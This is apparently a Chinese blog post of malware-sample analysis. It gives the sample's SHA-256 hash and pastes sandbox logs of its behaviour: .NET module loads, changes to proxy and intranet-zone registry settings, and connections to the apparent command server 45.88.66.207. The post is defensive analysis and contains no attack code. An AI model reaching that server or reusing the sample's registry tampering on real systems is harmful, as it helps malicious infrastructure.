首页 > 编程语言 >样本分析 99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行

样本分析 99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行

时间:2023-09-08 11:33:34浏览次数:55  
标签:0x00000000 exe 配置文件 int Parse 99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_EXEC

 

https://s.threatbook.com/report/file/99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d

09:30:16:088,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_create,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:200 cmdline:'C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe' image_base:0x0000000000C60000 image_size:0x000D8000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:104,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006E650000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000070BA0000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:126,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x000000006DE30000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\03a6965bc1bb789f37779e8951ecafc7\Microsoft.VisualBasic.ni.dll,	base:0x0000000072AC0000 size:0x001E2000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ef599b69e76b0aaae802df819481912b\System.Drawing.ni.dll,	base:0x0000000072600000 size:0x001A3000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:142,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\dd2f3bb5941e68b9d4d6affbe6fcc632\System.Windows.Forms.ni.dll,	base:0x000000006CFC0000 size:0x00E68000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:810,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:810,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x00000000738A0000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:810,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:825,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x000000006C840000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:831,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll,	base:0x00000000730A0000 size:0x0008E000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:831,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x0000000073BF0000 size:0x0016F000 ,	0x00000000 [操作成功完成。  ],	
09:30:16:864,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:864,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:16:864,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:19:800,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:19:800,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:19:800,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:4832,	1908,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:30:19:860,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	PROC_exec,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	target_pid:1672 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' ,	0x00000000 [操作成功完成。  ],	
09:30:52:418,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:0,	1908,	EXEC_create,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:1908 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' image_base:0x0000000000C60000 image_size:0x000D8000 ,	0x00000000 [操作成功完成。  ],	
09:30:52:433,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:0,	1908,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x0000000073BF0000 size:0x0016F000 ,	0x00000000 [操作成功完成。  ],	
09:30:52:449,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1908:0,	1908,	EXEC_destroy,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:200 cmdline:'C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:9140,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix,	type:0x00000001 datalen:2 data:'00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:9140,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix,	type:0x00000001 datalen:16 data:'43 6F 6F 6B 69 65 3A 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:9140,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix,	type:0x00000001 datalen:18 data:'56 69 73 69 74 65 64 3A 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:464,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:30:52:480,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:3828,	1908,	NET_connect,	45.88.66.207:80,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:31:06:433,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	1672:9140,	1908,	NET_connect,	45.88.66.207:80,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],

  

如果是英文环境运行,则:

09:37:10:492,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_create,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:8200 cmdline:'C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe' image_base:0x0000000000E70000 image_size:0x000D8000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:507,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Prefetch\99EDDC2794077F97A5CFE3098F431-2A2C7994.pf,	offset:0x00000000 datalen:0x00003C5B ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6216,	9028,	FILE_chmod,	C:\Windows\System32\wow64win.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6216,	9028,	FILE_chmod,	C:\Windows\System32\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\System32\wow64.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\System32\wow64cpu.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:108,	9028,	FILE_chmod,	C:\Windows\System32\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:108,	9028,	FILE_chmod,	C:\Windows\SysWOW64\mscoree.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\KernelBase.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:108,	9028,	FILE_chmod,	C:\Windows\SysWOW64\msvcrt.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\advapi32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\rpcrt4.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\sspicli.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5968,	9028,	FILE_chmod,	C:\Windows\SysWOW64\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:328,	9028,	FILE_chmod,	C:\Windows\System32\locale.nls,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:328,	9028,	FILE_chmod,	C:\Windows\SysWOW64\bcryptprimitives.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\cryptbase.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\ucrtbase.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6264,	9028,	FILE_chmod,	C:\Windows\SysWOW64\gdi32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\gdi32full.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6264,	9028,	FILE_chmod,	C:\Windows\SysWOW64\msvcp_win.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\user32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\kernel.appcore.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\vcruntime140_clr0400.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\SysWOW64\version.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:32,	9028,	FILE_chmod,	C:\Windows\SysWOW64\imm32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:32,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\SysWOW64\psapi.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\ucrtbase_clr0400.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\ole32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\SysWOW64\oleaut32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\uxtheme.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:328,	9028,	FILE_chmod,	C:\Windows\SysWOW64\combase.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\SysWOW64\bcrypt.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5968,	9028,	FILE_chmod,	C:\Windows\SysWOW64\shlwapi.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6216,	9028,	FILE_chmod,	C:\Windows\System32\user32.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:108,	9028,	FILE_chmod,	C:\Windows\SysWOW64\sechost.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:6264,	9028,	FILE_chmod,	C:\Windows\SysWOW64\win32u.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:32,	9028,	FILE_chmod,	C:\Windows\Globalization\Sorting\SortDefault.nls,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:236,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:523,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:96,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\zh-Hans\mscorrc.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:539,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:5888,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
